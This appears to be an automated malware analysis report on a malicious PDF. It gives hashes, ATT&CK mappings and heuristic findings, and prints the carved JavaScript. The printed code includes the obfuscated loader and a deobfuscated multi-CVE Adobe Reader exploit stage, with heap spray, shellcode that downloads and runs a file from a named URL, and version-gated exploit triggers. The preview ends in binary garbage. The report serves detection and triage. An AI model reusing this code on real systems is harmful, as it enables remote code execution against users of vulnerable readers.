PDF / .TMP malware analysis — malicious · 802f260d19908329

MALICIOUS

PDF / .TMP

5.3 KB Created: 2010-08-17 12:47:46 Authoring application: Liconadauarowa (via 9dc26Cauouosipazo) First seen: 2026-05-11

MD5: d453327a080be1b2987a87c167e1427d SHA-1: 272866922b20485a1a0d5305096d1d6238cd504c SHA-256: 802f260d19908329f9e3452aecf76d27d30272ba96bbc3fa39044be086f92153

468 Risk Score

Malware Insights

MITRE ATT&CK

T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

This PDF document contains embedded JavaScript that exploits multiple CVEs in Adobe Reader, including CVE-2009-4324, CVE-2009-0927, and CVE-2008-2992. The script is designed to download and execute a second-stage payload from the URL http://ahrudk.egh/4. The obfuscated JavaScript and the use of multiple exploit techniques indicate a malicious intent to compromise the user's system.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 10

media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324

PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927

PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992

PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH

A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT

One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.

Matched line in script

{
return 'var 77rCL = 7158 ;var nEJ = thi77s;Jv7arJ7 mL=J\'getPa\'7+\'geNthW\'7+\'JJoJ7rd\';var JvK=\'getP\'+\'ageNu77\'+\'JJmWor\'+\'ds\';7Jvar gRJ=\'f7rom\'+\'CharCo\'7+\'dJe\'J7;var7 pG=\'pag7JeN\'+\'um\';JJvar iBA=nE[J7vJJK]J(nJJE[pG]);vaJ7r77 mB77=7J\'\';forJ(var tU7V=0;tUV7< J7iBA; tUV++){mB=[mB,nE[mL](nJ7E[pG],tUV,t7Jrue)]JJ.joiJn(\'\')7;7;7}var 7lK=\'\';77for(7vJar tUV=0;t77UV < mB.leng7th; tUV+=2J7){j77Q7J=mB.JsubstrJ7(tUVJ,277);lK=[lK,Str7in77g[gRJ]J(Jparse7Int(j7Q,1J67)^J7rCL)]77.joiJn( …
}

Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://ahrudk.egh/4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0011_000.js`	pdf-javascript-stream	PDF /JS object 11 at offset 0xFBF	738 bytes
SHA-256: `d61d482c6433952270c36196ace48df73af3643d59a9d9f3780f823e0255291f`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script bA=waitForBody(); var wPI=focusCommandLine(); var iX=new this[wPI](bA); function focusCommandLine(){ return 'FuncGtGGion'.replace(/[G]/g, ''); } function waitForBody() { return 'var 77rCL = 7158 ;var nEJ = thi77s;Jv7arJ7 mL=J\'getPa\'7+\'geNthW\'7+\'JJoJ7rd\';var JvK=\'getP\'+\'ageNu77\'+\'JJmWor\'+\'ds\';7Jvar gRJ=\'f7rom\'+\'CharCo\'7+\'dJe\'J7;var7 pG=\'pag7JeN\'+\'um\';JJvar iBA=nE[J7vJJK]J(nJJE[pG]);vaJ7r77 mB77=7J\'\';forJ(var tU7V=0;tUV7< J7iBA; tUV++){mB=[mB,nE[mL](nJ7E[pG],tUV,t7Jrue)]JJ.joiJn(\'\')7;7;7}var 7lK=\'\';77for(7vJar tUV=0;t77UV < mB.leng7th; tUV+=2J7){j77Q7J=mB.JsubstrJ7(tUVJ,277);lK=[lK,Str7in77g[gRJ]J(Jparse7Int(j7Q,1J67)^J7rCL)]77.joiJn(\'\');}eval(lK77);lK=null;'.replace(/[7J]/g, ''); } iX();
`legacy_pdfkit_stage_000.js`	deobfuscated-js	getPageWords-XOR Pidief stage normalized at offset 0x0	4863 bytes
SHA-256: `b058d22f740c2d5f74f69bd8a0698585a6968168aeaf8d0a1db8cec4303f85b7`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long hex-escaped blob(s).
Preview script First 1,000 lines of the extracted script v={h:30626};sB={};var yT='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%#';try {var hM='tU'.substring(26727)} catch(hM){};try {var hU='oP'.substring(5107)} catch(hU){};var d=this.info['t'].replace(/[\s]/g, '');var xK="xK";try {var lA='sBM'.substr(14201,14201)} catch(lA){};try {var jI='yL'.substr(12965,12965)} catch(jI){};var tUP = this.info;var lUP = (tUP.producer.substr(0,5) == 'debug');var z = new Array(); var xI = "%u";function gV(str){str = str.split(xI);var ret="";for(var i in str){if(str[i] != "")ret += String.fromCharCode(parseInt(str[i],16));}return ret;}function zI(str1, str2){return [str1, str2].join("");}function iZ(tUZ){var vS = cH();var f = p();vS += ((vS.indexOf("?") > -1) ? "&" : "?") + "reader_version=" + f;if(lUP) app.alert("URL: " + vS);var d=xI;var jQ="\x50\x53\x51\x52\x56\x57\x55\x9C\xE8\x00\x00\x00\x00\x5D\x83\xED\x0D\x31\xC0\x64\x03\x40\x30\x78\x10\x8B\x40\x0C\x8B\x70\x14\xAD\x89\xC0\x89\xC0\x8B\x40\x10\xEB\x09\x8B\x40\x34\x8D\x40\x7C\x8B\x40\x3C\x56\x57\xBE\xE2\x00\x00\x00\x01\xEE\xBF\xD2\x00\x00\x00\x01\xEF\xE8\x56\x01\x00\x00\x5F\x5E\x89\xEA\x81\xC2\xE2\x00\x00\x00\x52\x68\x80\x00\x00\x00\xFF\x95\xD2\x00\x00\x00\x89\xEA\x81\xC2\xE2\x00\x00\x00\x31\xF6\x01\xC2\x8A\x9C\x35\xE7\x01\x00\x00\x80\xFB\x00\x74\x06\x88\x1C\x32\x46\xEB\xEE\xC6\x04\x32\x00\x89\xEA\x81\xC2\xC9\x01\x00\x00\x52\xFF\x95\xD6\x00\x00\x00\x89\xEA\x81\xC2\xD4\x01\x00\x00\x52\x50\xFF\x95\xDA\x00\x00\x00\x6A\x00\x6A\x00\x89\xEA\x81\xC2\xE2\x00\x00\x00\x52\x89\xEA\x81\xC2\xF4\x01\x00\x00\x52\x6A\x00\xFF\xD0\x6A\x05\x89\xEA\x81\xC2\xE2\x00\x00\x00\x52\xFF\x95\xDE\x00\x00\x00\x9D\x5D\x5F\x5E\x5A\x59\x5B\x58\xC3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x47\x65\x74\x54\x65\x6D\x70\x50\x61\x74\x68\x41\x00\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x00\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x00\x57\x69\x6E\x45\x78\x65\x63\x00\xBB\x89\xF2\x89\xF7\x30\xC0\xAE\x75\xFD\x29\xF7\x89\xF9\x31\xC0\xBE\x3C\x00\x00\x00\x03\xB5\x9F\x01\x00\x00\x66\xAD\x03\x85\x9F\x01\x00\x00\x8B\x70\x78\x83\xC6\x1C\x03\xB5\x9F\x01\x00\x00\x8D\xBD\xA3\x01\x00\x00\xAD\x03\x85\x9F\x01\x00\x00\xAB\xAD\x03\x85\x9F\x01\x00\x00\x50\xAB\xAD\x03\x85\x9F\x01\x00\x00\xAB\x5E\x31\xDB\xAD\x56\x03\x85\x9F\x01\x00\x00\x89\xC6\x89\xD7\x51\xFC\xF3\xA6\x59\x74\x04\x5E\x43\xEB\xE9\x5E\x93\xD1\xE0\x03\x85\xAB\x01\x00\x00\x31\xF6\x96\x66\xAD\xC1\xE0\x02\x03\x85\xA3\x01\x00\x00\x89\xC6\xAD\x03\x85\x9F\x01\x00\x00\xC3\xEB\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x89\x85\x9F\x01\x00\x00\x56\x57\xE8\x58\xFF\xFF\xFF\x5F\x5E\xAB\x01\xCE\x80\x3E\xBB\x74\x02\xEB\xED\xC3\x55\x52\x4C\x4D\x4F\x4E\x2E\x44\x4C\x4C\x00\x55\x52\x4C\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x54\x6F\x46\x69\x6C\x65\x41\x00\x31\x32\x33\x34\x35\x36\x37\x38\x2E\x65\x78\x65\x00";jQ+=vS;jQ+="\x00\x90";return jQ;};function cH(){var kZ = (tUP.author + tUP.title).replace(/[\s]/g, '');var rC = eF(kZ, d, yT);return rC;};function eF(kZ, yT, d){var rC="";for(var i=0; i < kZ.length; i++){var vIR = yT.indexOf(kZ[i]);if(vIR > -1 ){rC += d[vIR];}}return rC;};function zG(kZ){var out = "";kZ = mJ(kZ);g = Math.round(kZ.length / 4);if (g != kZ.length /4) kZ+="00";for(var i=0; i < kZ.length; i+=4){out+= xI + kZ.substr(i+2, 2) + kZ.substr(i, 2);}return out;};function mJ(s){var i, f = 0, a = [];s += '';f = s.length;for (i = 0; i<f; i++) {a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase();}return a.join('');};function vUR(xM, len){while (xM.length * 2 < len){xM = zI(xM, xM);}return xM.substring(0, len / 2);};function cB(lC){var kL = 0x0c0c0c0c; pM = iZ("pdf");if (lC == 1){kL = 0x30303030;}var sJ = 0x400000;var ln = pM.length * 2;var vY = sJ - (ln + 0x38);var xM = gV(xI+"9090"+xI+"9090"); xM = vUR(xM, vY);var uL = (kL - 0x400000) / sJ;for (var nM = 0; nM < uL; nM ++ ){z[nM] = zI(xM, pM);}};function p(){try {return app.viewerVersion.toString();}catch(aHE){ return 0;}}if(lUP) app.alert("called exploit");var f = p();if(lUP) app.alert("v: " + f);if (f > 8){if(lUP) app.alert("util.printf");cB(1);var eH = "12999999999999999999";for (nW=0; nW < 276; nW++) eH += "8";util.printf("%45000f", eH);}if (f < 8){if(lUP) app.alert("Collab.collectEmailInfo");cB(0);var wH = gV(xI+"0c0c"+xI+"0c0c");while (wH.length < 44952) wH += wH;this.collabStore = Collab.collectEmailInfo({ subj : "", msg : wH});}if (f < 9.1){if (app.doc.Collab.getIcon){if(lUP) app.alert("Collab.getIcon");cB(0);var pS = unescape("%09");while (pS.length < 0x4000) pS += pS;pS = "N." + pS;app.doc.Collab.getIcon(pS);}}if (f == 9.2){if(lUP) app.alert("media.newPlayer");cB(1);var sf="1.000000000.000000000.1337 : 3.13.37";util.printd(sf, new Date());try {media.newPlayer(null);} catch(e) {}util.printd(sf, new Date());}var nC=["gT","vC","iB"];this.b=13612;this.b++;try {var eL='jM'} catch(eL){};var r=[];@�� @�� @�� @�� $Ύ��[��

Open this report in the interactive analyzer, or submit your own file for analysis.